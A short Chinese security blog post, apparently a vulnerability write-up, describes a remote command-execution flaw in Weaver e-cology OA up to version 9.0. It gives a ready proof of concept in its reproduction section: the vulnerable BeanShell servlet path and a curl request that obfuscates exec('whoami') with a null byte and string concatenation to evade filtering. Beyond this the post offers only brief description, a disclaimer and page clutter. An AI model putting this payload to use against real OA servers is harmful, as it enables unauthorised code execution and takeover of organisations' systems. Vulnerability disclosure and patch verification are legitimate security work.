泛微OA系统多版本存在命令执行漏洞-POC

OnionT@KillBoy 渗透测试评论14,2262字数 462阅读1分32秒阅读模式

0x01漏洞描述
泛微OA办公系统是一款协调办公软件。
泛微协同商务软件系统weaver e-cology 8存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03影响范围
泛微 e-cology<=9.0

0x04漏洞复现
访问 http://url/weaver/bsh.servlet.BshServleth 输入 payload 如下:

漏洞路径:/weaver/bsh.servlet.BshServlet exec("whoami") curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev al%00("ex"%2b"ec(/"whoami/")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

http://www.oniont.cn/index.php/archives/224.html

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
OnionT@KillBoy
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: